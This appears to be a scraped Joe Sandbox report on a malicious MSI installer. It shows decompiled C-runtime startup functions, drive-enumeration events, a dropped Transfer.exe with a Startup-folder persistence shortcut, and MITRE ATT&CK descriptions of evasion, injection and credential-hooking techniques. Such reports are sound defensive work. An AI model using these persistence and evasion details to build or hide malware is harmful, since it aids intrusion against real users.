Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4d3f94c81d3943c378cad470bf1a73962749ad578d4a4a79ac19c895b724af
Instruction ID: 7f4e1801364772217b1c7ef94e12749d4bc0dcea1b9d8748cb1ac52ae325fd20
Opcode Fuzzy Hash: 4b4d3f94c81d3943c378cad470bf1a73962749ad578d4a4a79ac19c895b724af
Instruction Fuzzy Hash: 29F0A0F27046080AD718F778AC66D2E7298EB24360710473AF11AC6282FA62E994C35A

Uniqueness

Uniqueness Score: -1.00%

Function 008848B6 Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008848B6() {
				void* _t4;
				void* _t8;

				E00885477();
				E0088540B();
				if(E0088514E() != 0) {
					_t4 = E00884B72(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0088518A();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x008848b6
0x008848bb
0x008848c7
0x008848cc
0x008848d1
0x008848d3
0x008848de
0x008848d5
0x008848d5
0x00000000
0x008848d5
0x008848c9
0x008848c9
0x008848cb
0x008848cb

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 008848B6
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 008848BB
___vcrt_initialize_locks.LIBVCRUNTIME ref: 008848C0

Part of subcall function 0088514E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0088515F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 008848D5

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: e092bf8d1f2de1a436e08f72e43c775e9d4ad525a9e452ad70d54133d921d8c2
Instruction ID: a32cd774844a37728b5610dfc3c5b3ce42789798964e08ef0ba0d267bb5a4d99
Opcode Fuzzy Hash: e092bf8d1f2de1a436e08f72e43c775e9d4ad525a9e452ad70d54133d921d8c2
Instruction Fuzzy Hash: E0C04C5A051A87959DA47AF921163AD1340FC527D9BA035E1E891D78039D06084E1B7B

Uniqueness

Uniqueness Score: -1.00%

Function 008888DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E008888DC(void* __edi) {
				void** _v8;
				struct _STARTUPINFOW* _v24;
				short _v26;
				char _v76;
				void* __ebx;
				void* __esi;
				void* __ebp;
				struct _STARTUPINFOW* _t19;
				long _t23;
				void** _t24;
				LPWSTR* _t32;
				void* _t35;
				signed char _t38;
				void* _t40;
				void* _t41;
				signed int _t42;
				long _t45;

				_t41 = __edi;
				_t19 =  &_v76;
				GetStartupInfoW(_t19);
				if(_v26 == 0) {
					L17:
					return _t19;
				}
				_t19 = _v24;
				if(_t19 == 0) {
					goto L17;
				}
				_t45 = _t19->cb;
				_t32 =  &(_t19->lpReserved);
				_v8 = _t32 + _t45;
				if(_t45 >= 0x2000) {
					_t45 = 0x2000;
				}
				_push(_t45);
				E00888703(_t32, _t41, _t45);
				_t23 =  *0x897348; // 0x40
				if(_t45 > _t23) {
					_t45 = _t23;
				}
				_push(_t41);
				_t42 = 0;
				if(_t45 == 0) {
					L16:
					return _t23;
				} else {
					_t24 = _v8;
					do {
						_t35 =  *_t24;
						if(_t35 != 0xffffffff && _t35 != 0xfffffffe) {
							_t38 =  *_t32;
							if((_t38 & 0x00000001) != 0) {
								if((_t38 & 0x00000008) != 0 || GetFileType(_t35) != 0) {
									_t40 = (_t42 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x897148 + (_t42 >> 6) * 4));
									 *(_t40 + 0x18) =  *_v8;
									 *((char*)(_t40 + 0x28)) =  *_t32;
								}
								_t24 = _v8;
							}
						}
						_t42 = _t42 + 1;
						_t24 =  &(_t24[1]);
						_t32 =  &(_t32[0]);
						_v8 = _t24;
					} while (_t42 != _t45);
					goto L16;
				}
			}

0x008888dc
0x008888e4
0x008888e8
0x008888f3
0x00888991
0x00888991
0x00888991
0x008888f9
0x008888fe
0x00000000
0x00000000
0x00888906
0x00888908
0x0088890e
0x00888918
0x0088891a
0x0088891a
0x0088891c
0x0088891d
0x00888922
0x0088892a
0x0088892c
0x0088892c
0x0088892e
0x0088892f
0x00888933
0x0088898b
0x00000000
0x00888935
0x00888935
0x00888938
0x00888938
0x0088893d
0x00888944
0x00888949
0x0088894e
0x0088896b
0x00888974
0x00888979
0x00888979
0x0088897c
0x0088897c
0x00888949
0x0088897f
0x00888980
0x00888983
0x00888984
0x00888987
0x00000000
0x00888938

APIs

GetStartupInfoW.KERNEL32(?), ref: 008888E8
GetFileType.KERNEL32 ref: 00888951

Strings

PPqt, xrefs: 008888E8

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: FileInfoStartupType
String ID: PPqt
API String ID: 3016745765-3887661980
Opcode ID: 44de97bb2d4a97c1b3df4f2201587680a04010cbb7b1c07566c5034129977812
Instruction ID: 48cc9f2a7c564cd1f3aa4871e863a4093d6a2661d2597c2664550c7c4ce25b19
Opcode Fuzzy Hash: 44de97bb2d4a97c1b3df4f2201587680a04010cbb7b1c07566c5034129977812
Instruction Fuzzy Hash: 9721C036A00119CFDB24EF6CCC84ABDBBA5FF45354B680295E885E7361DB30DD428792

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Fct63e39.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\5b7a96.rbs

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transfer.exe.lnk

C:\Users\user\Pictures\Transfer.exe

C:\Users\user\Pictures\drivespan.dll

C:\Windows\Installer\5b7a94.msi

C:\Windows\Installer\MSI8235.tmp

C:\Windows\Installer\MSI839D.tmp

C:\Windows\Installer\MSI842B.tmp

C:\Windows\Installer\MSI8499.tmp

C:\Windows\Installer\MSI8556.tmp

C:\Windows\Installer\MSI87B8.tmp

C:\Windows\Installer\SourceHash{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}

C:\Windows\Installer\inprogressinstallinfo.ipi

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

C:\Windows\Temp\~DF147BAAEB4286EC57.TMP

C:\Windows\Temp\~DF1492B57AD70E2A46.TMP

C:\Windows\Temp\~DF21817EECA17C0101.TMP

C:\Windows\Temp\~DF279B538C114F01E3.TMP

C:\Windows\Temp\~DF283994664753916C.TMP

C:\Windows\Temp\~DF709F1F9EF7627A8A.TMP

Windows Analysis Report
Fct63e39.msi

Function 00881000 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 308
libraryloaderCOMMON

Function 008817A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 98
libraryloaderCOMMON

Function 00882F17 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 3
COMMON

Function 00888169 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Function 00888654 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Function 00886BDB Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 00886B4A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Function 00881510 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 172
sleepprocessCOMMON

Function 008855D7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78
COMMONLIBRARYCODE

Function 00886268 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 008875CA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127
COMMON

Function 0088CD15 Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Function 00889302 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 00888F76 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Function 00886F39 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Function 0088A33F Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Function 0088AC93 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Function 00888C93 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre